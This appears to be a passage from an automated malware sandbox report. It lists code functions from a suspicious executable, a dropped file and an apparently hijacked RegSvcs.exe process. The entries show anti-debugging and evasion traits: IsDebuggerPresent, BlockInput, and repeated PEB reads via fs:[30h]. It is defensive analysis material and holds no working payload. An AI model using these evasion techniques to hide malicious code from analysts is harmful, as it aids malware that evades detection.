            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004174F3 LdrLoadDll,15_2_004174F3
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDF3FF BlockInput,8_2_00DDF3FF
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E86878
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D65D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00D65D78
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8ECAA mov eax, dword ptr fs:[00000030h]0_2_00E8ECAA
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D85078 mov eax, dword ptr fs:[00000030h]8_2_00D85078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov ecx, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01474144 mov eax, dword ptr fs:[00000030h]15_2_01474144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01478158 mov eax, dword ptr fs:[00000030h]15_2_01478158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4164 mov eax, dword ptr fs:[00000030h]15_2_014B4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4164 mov eax, dword ptr fs:[00000030h]15_2_014B4164
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov eax, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E10E mov ecx, dword ptr fs:[00000030h]15_2_0148E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov ecx, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov eax, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov eax, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148A118 mov eax, dword ptr fs:[00000030h]15_2_0148A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A0115 mov eax, dword ptr fs:[00000030h]15_2_014A0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01410124 mov eax, dword ptr fs:[00000030h]15_2_01410124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6154 mov eax, dword ptr fs:[00000030h]15_2_013E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6154 mov eax, dword ptr fs:[00000030h]15_2_013E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC156 mov eax, dword ptr fs:[00000030h]15_2_013DC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A61C3 mov eax, dword ptr fs:[00000030h]15_2_014A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A61C3 mov eax, dword ptr fs:[00000030h]15_2_014A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov ecx, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E1D0 mov eax, dword ptr fs:[00000030h]15_2_0145E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA197 mov eax, dword ptr fs:[00000030h]15_2_013DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA197 mov eax, dword ptr fs:[00000030h]15_2_013DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA197 mov eax, dword ptr fs:[00000030h]15_2_013DA197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B61E5 mov eax, dword ptr fs:[00000030h]15_2_014B61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014101F8 mov eax, dword ptr fs:[00000030h]15_2_014101F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149C188 mov eax, dword ptr fs:[00000030h]15_2_0149C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149C188 mov eax, dword ptr fs:[00000030h]15_2_0149C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01420185 mov eax, dword ptr fs:[00000030h]15_2_01420185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01484180 mov eax, dword ptr fs:[00000030h]15_2_01484180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01484180 mov eax, dword ptr fs:[00000030h]15_2_01484180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146019F mov eax, dword ptr fs:[00000030h]15_2_0146019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466050 mov eax, dword ptr fs:[00000030h]15_2_01466050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA020 mov eax, dword ptr fs:[00000030h]15_2_013DA020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC020 mov eax, dword ptr fs:[00000030h]15_2_013DC020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE016 mov eax, dword ptr fs:[00000030h]15_2_013FE016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140C073 mov eax, dword ptr fs:[00000030h]15_2_0140C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01464000 mov ecx, dword ptr fs:[00000030h]15_2_01464000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01482000 mov eax, dword ptr fs:[00000030h]15_2_01482000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E2050 mov eax, dword ptr fs:[00000030h]15_2_013E2050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476030 mov eax, dword ptr fs:[00000030h]15_2_01476030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014620DE mov eax, dword ptr fs:[00000030h]15_2_014620DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D80A0 mov eax, dword ptr fs:[00000030h]15_2_013D80A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014660E0 mov eax, dword ptr fs:[00000030h]15_2_014660E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014220F0 mov ecx, dword ptr fs:[00000030h]15_2_014220F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E208A mov eax, dword ptr fs:[00000030h]15_2_013E208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC0F0 mov eax, dword ptr fs:[00000030h]15_2_013DC0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E80E9 mov eax, dword ptr fs:[00000030h]15_2_013E80E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA0E3 mov ecx, dword ptr fs:[00000030h]15_2_013DA0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014780A8 mov eax, dword ptr fs:[00000030h]15_2_014780A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A60B8 mov eax, dword ptr fs:[00000030h]15_2_014A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A60B8 mov ecx, dword ptr fs:[00000030h]15_2_014A60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B634F mov eax, dword ptr fs:[00000030h]15_2_014B634F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01462349 mov eax, dword ptr fs:[00000030h]15_2_01462349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AA352 mov eax, dword ptr fs:[00000030h]15_2_014AA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01488350 mov ecx, dword ptr fs:[00000030h]15_2_01488350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov ecx, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146035C mov eax, dword ptr fs:[00000030h]15_2_0146035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC310 mov ecx, dword ptr fs:[00000030h]15_2_013DC310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148437C mov eax, dword ptr fs:[00000030h]15_2_0148437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A30B mov eax, dword ptr fs:[00000030h]15_2_0141A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A30B mov eax, dword ptr fs:[00000030h]15_2_0141A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A30B mov eax, dword ptr fs:[00000030h]15_2_0141A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400310 mov ecx, dword ptr fs:[00000030h]15_2_01400310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov eax, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov ecx, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov eax, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B8324 mov eax, dword ptr fs:[00000030h]15_2_014B8324
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149C3CD mov eax, dword ptr fs:[00000030h]15_2_0149C3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014663C0 mov eax, dword ptr fs:[00000030h]15_2_014663C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov eax, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov eax, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov ecx, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148E3DB mov eax, dword ptr fs:[00000030h]15_2_0148E3DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014843D4 mov eax, dword ptr fs:[00000030h]15_2_014843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014843D4 mov eax, dword ptr fs:[00000030h]15_2_014843D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8397 mov eax, dword ptr fs:[00000030h]15_2_013D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8397 mov eax, dword ptr fs:[00000030h]15_2_013D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8397 mov eax, dword ptr fs:[00000030h]15_2_013D8397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE388 mov eax, dword ptr fs:[00000030h]15_2_013DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE388 mov eax, dword ptr fs:[00000030h]15_2_013DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE388 mov eax, dword ptr fs:[00000030h]15_2_013DE388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014163FF mov eax, dword ptr fs:[00000030h]15_2_014163FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F0 mov eax, dword ptr fs:[00000030h]15_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F0 mov eax, dword ptr fs:[00000030h]15_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE3F0 mov eax, dword ptr fs:[00000030h]15_2_013FE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140438F mov eax, dword ptr fs:[00000030h]15_2_0140438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140438F mov eax, dword ptr fs:[00000030h]15_2_0140438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F03E9 mov eax, dword ptr fs:[00000030h]15_2_013F03E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA3C0 mov eax, dword ptr fs:[00000030h]15_2_013EA3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E83C0 mov eax, dword ptr fs:[00000030h]15_2_013E83C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01468243 mov eax, dword ptr fs:[00000030h]15_2_01468243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01468243 mov ecx, dword ptr fs:[00000030h]15_2_01468243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D823B mov eax, dword ptr fs:[00000030h]15_2_013D823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B625D mov eax, dword ptr fs:[00000030h]15_2_014B625D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149A250 mov eax, dword ptr fs:[00000030h]15_2_0149A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149A250 mov eax, dword ptr fs:[00000030h]15_2_0149A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01490274 mov eax, dword ptr fs:[00000030h]15_2_01490274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D826B mov eax, dword ptr fs:[00000030h]15_2_013D826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4260 mov eax, dword ptr fs:[00000030h]15_2_013E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4260 mov eax, dword ptr fs:[00000030h]15_2_013E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4260 mov eax, dword ptr fs:[00000030h]15_2_013E4260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6259 mov eax, dword ptr fs:[00000030h]15_2_013E6259
